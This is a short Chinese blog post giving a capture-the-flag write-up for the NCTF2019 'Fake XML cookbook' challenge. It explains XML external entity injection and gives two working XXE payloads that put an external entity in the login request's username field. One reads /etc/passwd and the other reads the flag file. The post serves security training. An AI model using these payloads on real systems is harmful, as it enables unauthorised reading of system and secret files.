[NCTF2019]Fake XML cookbook

知识点

  • xml实体注入

题目提示XML,可知为XXE攻击,原理参考https://www.freebuf.com/vuls/175451.html

简要来讲就是客户端向服务器发送了XML数据,这个数据能被我们控制,这样我们就可以增加一个恶意的外部实体,实现攻击

先抓包

 

这里看到username和password都是xml格式,接下来增加我们自己的恶意实体,读取/etc/passwd文件

 

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///etc/passwd">
  ]>
<user><username>&admin;</username><password>123456</password></user>

 

 读取flag

 

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>
<user><username>&admin;</username><password>123456</password></user>

 

posted @ 2020-05-14 18:00  山野村夫z1  阅读(447)  评论(0)    收藏  举报